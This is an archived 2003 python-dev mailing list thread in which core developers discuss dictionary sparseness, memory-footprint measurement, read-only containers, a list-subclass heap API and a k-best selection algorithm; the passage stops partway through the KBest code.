From jeremy@zope.com  Mon May  5 18:41:35 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 05 May 2003 13:41:35 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051936.20078.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305051842.02937.aleax@aleax.it>
 <1052154710.12534.14.camel@slothrop.zope.com>
 <200305051936.20078.aleax@aleax.it>
Message-ID: <1052156494.12531.27.camel@slothrop.zope.com>

On Mon, 2003-05-05 at 13:36, Alex Martelli wrote:
> No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> work with a system that thinks it's so smart it doesn't need my advisory
> input -- or at least not on anything that's as performance-crucial as
> those Fortran programs were (most of my work in IBM Research in
> did with Rexx -- that's when I learned to love scripting! -- but then and
> again we did have to crunch really huge batches of numbers).

I think the graybox project is assuming that few people will have the
luxury of working with a system that accepts useful advisory input. 
Given that hypothesis, they built a tool for identifying what algorithm
is being used so that it can be tweaked appropriately.

Jeremy




From guido@python.org  Mon May  5 18:46:28 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 13:46:28 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Your message of "Mon, 05 May 2003 19:36:20 +0200."
 <200305051936.20078.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051842.02937.aleax@aleax.it> <1052154710.12534.14.camel@slothrop.zope.com>
 <200305051936.20078.aleax@aleax.it>
Message-ID: <200305051746.h45HkS009569@odiug.zope.com>

> No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> work with a system that thinks it's so smart it doesn't need my advisory
> input -- or at least not on anything that's as performance-crucial as
> those Fortran programs were [...]

I severely doubt that any Python apps are as performance-critical as
those Fortran programs were.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Mon May  5 18:40:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 13:40:18 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <1052154710.12534.14.camel@slothrop.zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCECGFJAA.tim.one@comcast.net>

[Jeremy Hylton]
> Have you seen the work on gray-box systems?
>
> http://www.cs.wisc.edu/graybox/
>
> The philosophy of this project seems to be "You can observe an awful lot
> just by watching."  (Apologies to Yogi.)  The approach is to learn how a
> particular service is implemented, e.g. what buffer-replacement
> algorithm is used, by observing its behavior.  Then write an application
> that exploits that knowledge to drive the system into optimized behavior
> for  the application.  No madvise() necessary.
>
> I wonder if the same can be done for dicts?  My first guess would be no,
> because the sparseness is a fixed policy.

Well, a dict suffers damaging collisions or it doesn't.  If it does, the
best thing a user can do is rebuild the dict from scratch, inserting keys by
decreasing order of access frequency.  Then the most frequently accessed
keys come earliest in their collision chains.  Collisions simply don't
matter for rarely referenced keys.  (And, for example, if there *are* any
truly damaging collisions in __builtin__.__dict__, I expect this gimmick
would remove the damage.)  The size of the dict can be forced larger by
inserting artificial keys, if a user is insane <wink>.  It's always been
possible to eliminate dummy entries by doing "dict = dict.copy()".  Note
that because Python exposes the hash function used by dicts, you can write a
faithful low-level dict emulator in Python, and deduce what effects a
sequence of dict inserts and deletes will have.  So, overall, I expect
there's more you *could* do to speed dict access (in the handful of bad
cases it's not already good enough) yourself than Python could do for you.
You'd have to be nuts, though -- or writing papers on gray-box systems.
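
(A sketch of that rebuilding trick, assuming you've gathered per-key hit
counts yourself -- Python keeps no such statistic:)

    def rebuild_by_frequency(d, access_count):
        # Insert the hottest keys first so they land earliest in their
        # collision chains; building a fresh dict also drops any dummy
        # (deleted) slots along the way.
        order = [(-access_count.get(k, 0), k) for k in d]
        order.sort()
        rebuilt = {}
        for negcount, k in order:
            rebuilt[k] = d[k]
        return rebuilt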



From tim.one@comcast.net  Mon May  5 18:54:41 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 13:54:41 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051922.53855.aleax@aleax.it>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGECIFJAA.tim.one@comcast.net>

[Alex Martelli]
> ...
> As CPUs and floating-point units became fast enough, more and more of
> the speed issues with so-called "CPU intensive" bottlenecks in
> mechanical-engineering CAD actually became related to memory-access
> patterns (a phenomenon I had already observed when I worked on IBM
> multi-CPU mainframes with vector-units, being sold as "supercomputers"
> but in fact still having complex and deep memory hierarchies -- Cray guys
> of the time such as Tim no doubt had it easier!-).

Indeed, Seymour Cray used to say a supercomputer is a machine that
transforms a CPU-bound program into an I/O-bound program, and didn't want
anything "in between" complicating that view.  As a result, optimizing
programs to run on Crays was, while still arbitrarily difficult, generally a
monotonic process, rarely beset by "mysterious regressions" along the way.

Now that gigabyte+ RAM boxes are becoming common, I wonder when someone will
figure out that the VM machinery is just slowing them down <0.9 wink>.



From aleax@aleax.it  Mon May  5 18:57:25 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 19:57:25 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051746.h45HkS009569@odiug.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051936.20078.aleax@aleax.it> <200305051746.h45HkS009569@odiug.zope.com>
Message-ID: <200305051957.25403.aleax@aleax.it>

On Monday 05 May 2003 07:46 pm, Guido van Rossum wrote:
> > No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> > work with a system that thinks it's so smart it doesn't need my advisory
> > input -- or at least not on anything that's as performance-crucial as
> > those Fortran programs were [...]
>
> I severely doubt that any Python apps are as performance-critical as
> those Fortran programs were.

Yes, this may well be correct.  My only TRUE wish for tuning performance
of Python applications is to have SOME ways to measure memory
footprints with sensible guesses about where they come from -- THAT
is where I might gain hugely (by fighting excessive working sets through
selective flushing of caches, freelists, etc).


Alex



From jeremy@zope.com  Mon May  5 19:12:12 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 05 May 2003 14:12:12 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051957.25403.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305051936.20078.aleax@aleax.it>
 <200305051746.h45HkS009569@odiug.zope.com>
 <200305051957.25403.aleax@aleax.it>
Message-ID: <1052158331.12534.31.camel@slothrop.zope.com>

On Mon, 2003-05-05 at 13:57, Alex Martelli wrote:
> On Monday 05 May 2003 07:46 pm, Guido van Rossum wrote:
> > > No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> > > work with a system that thinks it's so smart it doesn't need my advisory
> > > input -- or at least not on anything that's as performance-crucial as
> > > those Fortran programs were [...]
> >
> > I severely doubt that any Python apps are as performance-critical as
> > those Fortran programs were.
> 
> Yes, this may well be correct.  My only TRUE wish for tuning performance
> of Python applications is to have SOME ways to measure memory
> footprints with sensible guesses about where they come from -- THAT
> is where I might gain hugely (by fighting excessive working sets through
> selective flushing of caches, freelists, etc).

Any idea how to actually do this?

Jeremy




From python@rcn.com  Mon May  5 19:12:53 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 5 May 2003 14:12:53 -0400
Subject: [Python-Dev] Dictionary sparseness
References: <BIEJKCLHCIOIHAGOKOLHCECGFJAA.tim.one@comcast.net>
Message-ID: <000101c31339$791838c0$125ffea9@oemcomputer>

> the best thing a user can do is rebuild the dict from scratch, inserting keys by
> decreasing order of access frequency.

Then a periodic resize comes along, re-inserting everything
in a different order.


>The size of the dict can be forced larger by
> inserting artificial keys, if a user is insane <wink>. 

Uh oh:
    http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/198157


> You'd have to be nuts, though 

That explains a lot ;)


Does the *4 patch (amended to have an upper bound) have a chance?
It's automatic, simple, and benefits some cases while not harming others.


Raymond


From aleax@aleax.it  Mon May  5 20:21:28 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 21:21:28 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <1052158331.12534.31.camel@slothrop.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051957.25403.aleax@aleax.it> <1052158331.12534.31.camel@slothrop.zope.com>
Message-ID: <200305052121.28017.aleax@aleax.it>

On Monday 05 May 2003 08:12 pm, Jeremy Hylton wrote:
> On Mon, 2003-05-05 at 13:57, Alex Martelli wrote:
> > On Monday 05 May 2003 07:46 pm, Guido van Rossum wrote:
> > > > No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> > > > work with a system that thinks it's so smart it doesn't need my
> > > > advisory input -- or at least not on anything that's as
> > > > performance-crucial as those Fortran programs were [...]
> > >
> > > I severely doubt that any Python apps are as performance-critical as
> > > those Fortran programs were.
> >
> > Yes, this may well be correct.  My only TRUE wish for tuning performance
> > of Python applications is to have SOME ways to measure memory
> > footprints with sensible guesses about where they come from -- THAT
> > is where I might gain hugely (by fighting excessive working sets through
> > selective flushing of caches, freelists, etc).
>
> Any idea how to actually do this?

Not really, even though I've been thinking about it for a while -- pymalloc's
the only "hook" that comes to mind so far.


Alex



From skip@pobox.com  Mon May  5 20:35:23 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 14:35:23 -0500
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <200305051957.25403.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305051936.20078.aleax@aleax.it>
 <200305051746.h45HkS009569@odiug.zope.com>
 <200305051957.25403.aleax@aleax.it>
Message-ID: <16054.48379.533379.672799@montanaro.dyndns.org>

    Alex> My only TRUE wish for tuning performance of Python applications is
    Alex> to have SOME ways to measure memory footprints with sensible
    Alex> guesses about where they come from

Here's a thought.  Debug builds appear to now add a getobjects method to
sys.  Would it be possible to also add another method to sys (also only
available on debug builds) which knows just enough about basic builtin
object types to say a little about how much space it's consuming?  For
example, I could do something like this:

    allocdict = {}
    for o in sys.getobjects(0):
        allocsize = sys.get_object_allocation_size(o)
        # I'm not a fan of {}.setdefault()
        alloc = allocdict.get(type(o), [])
        alloc.append(allocsize) # or alloc.append((allocsize, o))
        allocdict[type(o)] = alloc

Once the list is traversed you can poke around in allocdict figuring out
where your memory went (other than to allocdict itself!).

(I was tempted to suggest another method, but I fear that would just spread
the mess around.  That may also be a viable option though.)

Skip


From tim@zope.com  Mon May  5 20:34:58 2003
From: tim@zope.com (Tim Peters)
Date: Mon, 5 May 2003 15:34:58 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <000101c31339$791838c0$125ffea9@oemcomputer>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com>

[Tim]
>> the best thing a user can do is rebuild the dict from scratch,
>> inserting keys by decreasing order of access frequency.

[Raymond Hettinger]
> Then a periodic resize comes alongm re-inserting everything
> in a different order.

Sure -- micro-optimizations are always fragile.  This kind of thing will be
done by someone who's certain the dict is henceforth read-only, and who
thinks it's worth the risk and obscurity to get some small speedup.  They're
probably right at the time they do it, too, and probably wrong over time.
Same thing goes for, e.g., an madvise() call claiming a current truth that
changes over time.

> ...
> Does the *4 patch (amended to have an upper bound) have a chance?
> It's automatic, simple, benefits some cases while not harming others,

It would be nice if more people tried it and added their results to the
patch report:

    http://www.python.org/sf/729395

Right now, we just have Guido's comment saying that he no longer sees the
Zope3 startup speedup he thought he saw earlier.  Small percentage speedups
are like that, alas.  The patch is OK by me.



From tim.one@comcast.net  Mon May  5 20:56:41 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 15:56:41 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <16054.48379.533379.672799@montanaro.dyndns.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEDFFJAA.tim.one@comcast.net>

[Skip Montanaro]
> Here's a thought.  Debug builds appear to now add a getobjects method to
> sys.

Yes, although that isn't new -- it's been there forever (read
Misc/SpecialBuilds.txt).

> Would it be possible to also add another method to sys (also only
> available on debug builds) which knows just enough about basic builtin
> object types to say a little about how much space it's consuming?

Marc-Andre has something like that in mxTools already (his sizeof()
function).

Note also the COUNT_ALLOCS special build, which saves info about total # of
allocations, deallocations, and highwater mark per type, made available via
sys.getcounts().  The nifty thing about COUNT_ALLOCS is that you can enable
it in a release build (it doesn't rely on the debug-build changes to the
layout of PyObject).
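
(Under a COUNT_ALLOCS build, a quick summary looks something like this --
a sketch, assuming each entry is (type name, allocs, frees, high-water mark):)

    import sys
    for name, allocs, frees, maxalloc in sys.getcounts():
        live = allocs - frees
        if live:
            print(name, live, maxalloc)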

Stuff all these things miss (even pymalloc, because it isn't asked for the
memory) include the immortal and unbounded int freelist, the I&U float FL,
and the immortal but bounded frameobject FL.  Do, e.g., range(2000000) (as
someone did on c.l.py last week), and about 24MB "goes missing" until the
program shuts down (it's sitting in the int FL).  Note that pymalloc never
returns its "arenas" to the system either.



From zooko@zooko.com  Mon May  5 21:02:08 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 05 May 2003 16:02:08 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: Message from "Raymond Hettinger" <python@rcn.com>
 of "Sun, 04 May 2003 22:26:47 EDT." <003f01c312ad$c7277580$125ffea9@oemcomputer>
References: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>  <003f01c312ad$c7277580$125ffea9@oemcomputer>
Message-ID: <E19CmA4-0006db-00@localhost>

>From heapq.py:

"""
Usage:

heap = []            # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0]       # smallest item on the heap without popping it
...
[It is] possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""

Shouldn't heapq be a subclass of list?

Then it would read:

"""
heap = heapq()    # creates an empty heap
heap.push(item)   # pushes a new item on the heap
item = heap.pop() # pops the smallest item from the heap
item = heap[0]    # smallest item on the heap without popping it
"""

In addition to nicer syntax, this would give you the option to forbid 
invariant-breaking alterations.  Although you could also choose to allow 
invariant-breaking alterations, just as the current heapq does.
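
(A minimal sketch of such a subclass, built on the existing heapq functions
rather than anything the module provides:)

    import heapq

    class heap(list):
        def __init__(self, iterable=()):
            list.__init__(self, iterable)
            heapq.heapify(self)          # establish the invariant up front
        def push(self, item):
            heapq.heappush(self, item)
        def pop(self):
            return heapq.heappop(self)   # smallest item, unlike list.pop()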

One thing I don't know how to implement is:

# This changes mylist itself into a heapq -- it doesn't make a copy of mylist!
makeheapq(mylist)

Perhaps this is a limitation of the current object model?  Or is there a way to
change an object's type at runtime?

Regards,

Zooko

http://zooko.com/


From agthorr@barsoom.org  Mon May  5 21:14:16 2003
From: agthorr@barsoom.org (Agthorr)
Date: Mon, 5 May 2003 13:14:16 -0700
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com>
References: <000101c31339$791838c0$125ffea9@oemcomputer> <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com>
Message-ID: <20030505201416.GB17384@barsoom.org>

On Mon, May 05, 2003 at 03:34:58PM -0400, Tim Peters wrote:
> Sure -- micro-optimizations are always fragile.  This kind of thing will be
> done by someone who's certain the dict is henceforth read-only, and who
> thinks it's worth the risk and obscurity to get some small speedup.  

An alternate optimization would be the addition of an immutable
dictionary type to the language, initialized from a mutable dictionary
type.  Upon creation, this dictionary would optimize itself, in a
manner similar to the "gperf" program, which creates (nearly) minimal
zero-collision hash tables.

On the plus side, this would form a nice symmetry with the existing
mutable vs immutable types.

Also, it would be proof against bit-rot, since either:
 a) the user changes the mutable dictionary before it is optimized.
    In this case, the optimizer will simply optimize the new
    dictionary, or
 b) the user attempts to modify the immutable dictionary, which will
    fail with an error.
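
(A rough pure-Python sketch of the immutable half -- it only blocks mutation;
the gperf-style repacking into a collision-free table would have to happen
down in dictobject.c:)

    class frozendict(dict):
        def _readonly(self, *args, **kwds):
            raise TypeError("immutable dictionary")
        __setitem__ = __delitem__ = _readonly
        clear = pop = popitem = setdefault = update = _readonly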

-- Agthorr


From skip@pobox.com  Mon May  5 21:24:39 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 15:24:39 -0500
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEDFFJAA.tim.one@comcast.net>
References: <16054.48379.533379.672799@montanaro.dyndns.org>
 <BIEJKCLHCIOIHAGOKOLHGEDFFJAA.tim.one@comcast.net>
Message-ID: <16054.51335.255858.381526@montanaro.dyndns.org>

    Tim> Stuff all these things miss (even pymalloc, because it isn't asked
    Tim> for the memory) include the immortal and unbounded int freelist,
    Tim> the I&U float FL, and the immortal but bounded frameobject FL.  Do,
    Tim> e.g., range(2000000) (as someone did on c.l.py last week), and
    Tim> about 24MB "goes missing" until the program shuts down (it's
    Tim> sitting in the int FL).  Note that pymalloc never returns its
    Tim> "arenas" to the system either.

These shortcomings could be remedied by suitable inspection functions added
to sys for debug builds.

This leads me to wonder, has anyone measured the cost of deleting the int
and float free lists when pymalloc is enabled?  I wonder how unbearable it
would be.

Skip


From martin@v.loewis.de  Mon May  5 21:39:40 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 05 May 2003 22:39:40 +0200
Subject: [Python-Dev] How to test this?
In-Reply-To: <16054.30310.489999.134263@montanaro.dyndns.org>
References: <16054.30310.489999.134263@montanaro.dyndns.org>
Message-ID: <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> I just added a patch file to <http://python.org/sf/731501>.  It
> doesn't include any test cases, since that requires an old db hash
> v2 file present.  Is it okay to check in a dummy file to Lib/test
> for this purpose?

Make sure you use -kb in the cvs add. Apart from that, it would be
fine by me - except that I recall that the file format is
endianness-sensitive, so you should make sure that the test passes on
machines of both endiannesses before adding the file.

Regards,
Martin



From aleax@aleax.it  Mon May  5 21:42:40 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 22:42:40 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <20030505201416.GB17384@barsoom.org>
References: <000101c31339$791838c0$125ffea9@oemcomputer> <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com> <20030505201416.GB17384@barsoom.org>
Message-ID: <200305052242.40380.aleax@aleax.it>

On Monday 05 May 2003 10:14 pm, Agthorr wrote:
> On Mon, May 05, 2003 at 03:34:58PM -0400, Tim Peters wrote:
> > Sure -- micro-optimizations are always fragile.  This kind of thing will
> > be done by someone who's certain the dict is henceforth read-only, and
> > who thinks it's worth the risk and obscurity to get some small speedup.
>
> An alternate optimization would be the addition of an immutable
> dictionary type to the language, initialized from a mutable dictionary

I'd love a read-only dictionary (AND a read-only list) for reasons having
little to do with optimization, actually -- ease of use as dict keys and/or
set members, plus, occasional help in catching errors (for the latter use
it would be wonderful if read-only dictionaries could be actually
substituted in place of such things as instance and class dictionaries).

Tuples are no substitutes for read-only lists because they lack many
useful "read-only" methods of lists (and won't grow them, as the BDFL
has abundantly made clear, as he sees tuples as drastically different
from lists).  Neither, even more clearly, are e.g. tuples of pairs a good
substitute for read-only dictionaries.

I've played with adding more selective "locking" to dicts but I was unable
to do it without a performance hit.  If wholesale "RO-ness" can in fact
*increase* performance in some cases, so much the better. "RO lists"
could probably save a little memory compared to normal ones since they
would need no "spare space" for growing.
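
In the same spirit, a quick sketch of what a read-only list might look like
from pure Python -- mutators disabled, and hashable by content so it can be
used as a dict key or set member ("rolist" is just an illustrative name):

class rolist(list):
    def _readonly(self, *args, **kwds):
        raise TypeError("rolist is read-only")
    append = extend = insert = remove = pop = sort = reverse = _readonly
    __setitem__ = __delitem__ = __setslice__ = __delslice__ = _readonly
    __iadd__ = __imul__ = _readonly
    def __hash__(self):
        return hash(tuple(self))

r = rolist([1, 2, 3])
d = {r: 'usable as a dict key'}
print r.count(2), r.index(3)   # the "read-only" list methods still work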


Alex



From martin@v.loewis.de  Mon May  5 21:43:17 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 05 May 2003 22:43:17 +0200
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEBGFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHOEBGFJAA.tim.one@comcast.net>
Message-ID: <m3u1c9azve.fsf@mira.informatik.hu-berlin.de>

Tim Peters <tim.one@comcast.net> writes:

> Are you saying that the "Select Destination Directory" dialog box doesn't
> allow you to select your E: drive?  Or just that you'd rather not need to
> select the drive you want?

I second the second; I noticed that Python installed on the "wrong
drive" (i.e. the W9x installation) only after installation was
complete. I don't know (and can't check at the moment) whether it
offered me to pick e:. It probably did, but I don't know for sure.

> So, AFAIK, there isn't a straightforward way to get Wise 8.14 to suggest a
> drive other than C:.  Perhaps it would work better for you if I removed the
> Wizard-generated hardcoded "C:" (I don't know which drive Wise would pick
> then), but since yours is the only complaint about this I've seen, and I
> have no way to test such a change, I'm very reluctant to fiddle with it.

I have the same complaint, and I'd happily test any updated installer.

Regards,
Martin


From zooko@zooko.com  Mon May  5 21:58:21 2003
From: zooko@zooko.com (Zooko)
Date: Mon, 05 May 2003 16:58:21 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Message from Alex Martelli <aleax@aleax.it>
 of "Mon, 05 May 2003 22:42:40 +0200." <200305052242.40380.aleax@aleax.it>
References: <000101c31339$791838c0$125ffea9@oemcomputer> <BIEJKCLHCIOIHAGOKOLHIEDDFJAA.tim@zope.com> <20030505201416.GB17384@barsoom.org>  <200305052242.40380.aleax@aleax.it>
Message-ID: <E19Cn2U-0007KX-00@localhost>

 Alex Martelli wrote:
>
> I'd love a read-only dictionary (AND a read-only list) for reasons having
> little to do with optimization, actually [...]

Me too!

It would be very useful for secure Python -- I could pass my list to some code
without risking that it mutates my list.  Without RO-lists I have to make a copy
of my list every time I want to show it to someone.

Regards,

Zooko

http://zooko.com/


From tim.one@comcast.net  Mon May  5 22:00:16 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 17:00:16 -0400
Subject: Where'd my memory go? (was Re: [Python-Dev] Dictionary sparseness)
In-Reply-To: <16054.51335.255858.381526@montanaro.dyndns.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEDNFJAA.tim.one@comcast.net>

[Skip Montanaro]

[on assorted freelists]
> These shortcomings could be remedied by suitable inspection
> functions added to sys for debug builds.

If someone cares enough <wink>, sure.

> This leads me to wonder, has anyone measured the cost of deleting the
> int and float free lists when pymalloc is enabled?  I wonder how
> unbearable it would be.

Vladimir did when he was first developing pymalloc, and left the free lists
in deliberately.  I haven't tried it.  pymalloc is a bit faster since then,
but will always have the additional overhead of needing to figure out
*which* freelist to look in (pymalloc's free lists are segregated by block
size), and, because it recycles empty pools among different block sizes too,
the overhead on free of checking for pool emptiness.  The int free list is
faster in part because it's so damn Narcissistic <0.7 wink>.



From skip@pobox.com  Mon May  5 22:24:59 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 16:24:59 -0500
Subject: [Python-Dev] How to test this?
In-Reply-To: <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>
References: <16054.30310.489999.134263@montanaro.dyndns.org>
 <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>
Message-ID: <16054.54955.226043.202262@montanaro.dyndns.org>

    Martin> Make sure you use -kb in the cvs add. 

Thanks, I'd forgotten about that.

    Martin> Apart from that, it would be fine by me - except that I recall
    Martin> that the file format is endianness-sensitive, so you should make
    Martin> sure that the test passes on machines of both endiannesses
    Martin> before adding the file.

It appears the database itself accounts for the endianness of the file.  I
copied my test db file from my Mac to a Linux PC.  struct.unpack("=l",
f.read(4)) showed different values on the two systems (0x61561 vs
0x61150600) but bsddb185 on both systems could read the file.  This is a
very nice property of Berkeley DB in general.  I copy db files from the
spambayes project all the time.  rsync(1) sure beats the heck out of dumping
and reloading a 20+MB file all the time.
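
For the record, the two values are just the same four magic bytes read in
opposite byte orders; the byte string below is reconstructed from the values
quoted above rather than taken from the actual test file:

import struct

raw = '\x61\x15\x06\x00'                # hypothetical first 4 bytes
print hex(struct.unpack('<l', raw)[0])  # 0x61561     (little-endian reading)
print hex(struct.unpack('>l', raw)[0])  # 0x61150600  (big-endian reading)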

Skip


From martin@v.loewis.de  Mon May  5 23:03:00 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 06 May 2003 00:03:00 +0200
Subject: [Python-Dev] How to test this?
In-Reply-To: <16054.54955.226043.202262@montanaro.dyndns.org>
References: <16054.30310.489999.134263@montanaro.dyndns.org>
 <m3y91lb01f.fsf@mira.informatik.hu-berlin.de>
 <16054.54955.226043.202262@montanaro.dyndns.org>
Message-ID: <m3smrt831n.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

> It appears the database itself accounts for the endianness of the file.  I
> copied my test db file from my Mac to a Linux PC.  struct.unpack("=l",
> f.read(4)) showed different values on the two systems (0x61561 vs
> 0x61150600) but bsddb185 on both systems could read the file.  This is a
> very nice property of Berkeley DB in general.

That's good to hear. I thought I understood a report on the Subversion
mailing list to say that you can't move databases across endiannesses, but
that might have been an unrelated issue.

Regards,
Martin



From tim.one@comcast.net  Tue May  6 01:33:39 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 20:33:39 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <003f01c312ad$c7277580$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAAEFAB.tim.one@comcast.net>

[Raymond Hettinger]
> FWIW, there is C implementation of heapq at:
>    http://zhar.net/projects/python/

Cool!  I thought the code was remarkably clear, until I realized it never
checked for errors (e.g., PyList_Append() can run out of memory, and
PyObject_RichCompareBool() can raise any exception).  Those would have to be
repaired, and doing so would slow it some.

If the heapq module survives with the same API for a release or two, it
would be a fine candidate to move into C, or maybe Pyrex (fiddly little
integer arithmetic interspersed via if/then/else with trivial array indexing
aren't Python's strong suits).



From tim.one@comcast.net  Tue May  6 03:35:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 22:35:28 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <20414172.1052079989@[10.0.1.2]>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAFEFAB.tim.one@comcast.net>

[David Eppstein, on the bar-raising behavior of

     person > q[0]
]

> Good point.  If any permutation of the input sequence is equally likely,
> and you're selecting the best k out of n items, the expected number of
> times you have to hit the data structure in your heapq solution
> is roughly k ln n, so the total expected time is O(n + k log k log n),
> with a really small constant factor on the O(n) term.  The sorting
> solution I suggested has total time O(n log k), and even though sorting
> is built-in and fast it can't compete when k is small.   Random pivoting
> is O(n + k), but with a larger constant factor, so your heapq solution
> looks like a winner.

In real Python Life, it's the fastest way I know (depending ...).

> For fairness, it might be interesting to try another run of your test
> in which the input sequence is sorted in increasing order rather
> than random.

Comparing the worst case of one against the best case of the other isn't my
idea of fairness <wink>, but sure.  On the best-1000 of a million floats
test, and sorting the floats first, the heap method ran about 30x slower
than on random data, and the sort method ran significantly faster than on
random data (a factor of 1.3x faster).  OTOH, if I undo my speed tricks and
call a function in the sort method (instead of doing it all micro-optimized
inline), that slows the sort method by a bit over a factor of 2.

> I.e., replace the random generation of seq by
>     seq = range(M)
> I'd try it myself, but I'm still running python 2.2 and haven't
> installed heapq.  I'd have to know more about your application to
> have an idea whether the sorted or randomly-permuted case is more
> representative.

Of course --  so would I <wink>.

Here's a surprise:  I coded a variant of the quicksort-like partitioning
method, at the bottom of this mail.  On the largest-1000 of a million
random-float case, times were remarkably steady across trials (i.e., using a
different set of a million random floats each time):

heapq                    0.96 seconds
sort (micro-optimized)   3.4  seconds
KBest (below)            2.6  seconds

The KBest code creates new lists with wild abandon.  I expect it does better
than the sort method anyway because it gets to exploit its own form of
"raise the bar" behavior as more elements come in.  For example, on the
first run, len(buf) exceeded 3000 only 14 times, and the final pivot value
each time is used by put() as an "ignore the input unless it's bigger than
that" cutoff:

pivoted w/ 0.247497558554
pivoted w/ 0.611006884768
pivoted w/ 0.633565558936
pivoted w/ 0.80516673256
pivoted w/ 0.814304890889
pivoted w/ 0.884660572175
pivoted w/ 0.89986744075
pivoted w/ 0.946575251872
pivoted w/ 0.980386533221
pivoted w/ 0.983743795382
pivoted w/ 0.992381911217
pivoted w/ 0.994243625292
pivoted w/ 0.99481443021
pivoted w/ 0.997044443344

The already-sorted case is also a bad case for this method, because then the
pivot is never big enough to trigger the early exit in put().


def split(seq, pivot):
    lt, eq, gt = [], [], []
    lta, eqa, gta = lt.append, eq.append, gt.append
    for x in seq:
        c = cmp(x, pivot)
        if c < 0:
            lta(x)
        elif c:
            gta(x)
        else:
            eqa(x)
    return lt, eq, gt

# KBest(k, minusinf) remembers the largest k objects
# from a sequence of objects passed one at a time to
# put().  minusinf must be smaller than any object
# passed to put().  After feeding in all the objects,
# call get() to retrieve a list of the k largest (or
# as many as were passed to put(), if put() was called
# fewer than k times).

class KBest(object):
    __slots__ = 'k', 'buflim', 'buf', 'cutoff'

    def __init__(self, k, minusinf):
        self.k = k
        self.buflim = 3*k
        self.buf = []
        self.cutoff = minusinf

    def put(self, obj):
        if obj <= self.cutoff:
            return

        buf = self.buf
        buf.append(obj)
        if len(buf) <= self.buflim:
            return

        # Reduce len(buf) by at least one, by retaining
        # at least k, and at most len(buf)-1, of the
        # largest objects in buf.
        from random import choice
        sofar = []
        k = self.k
        while len(sofar) < k:
            pivot = choice(buf)
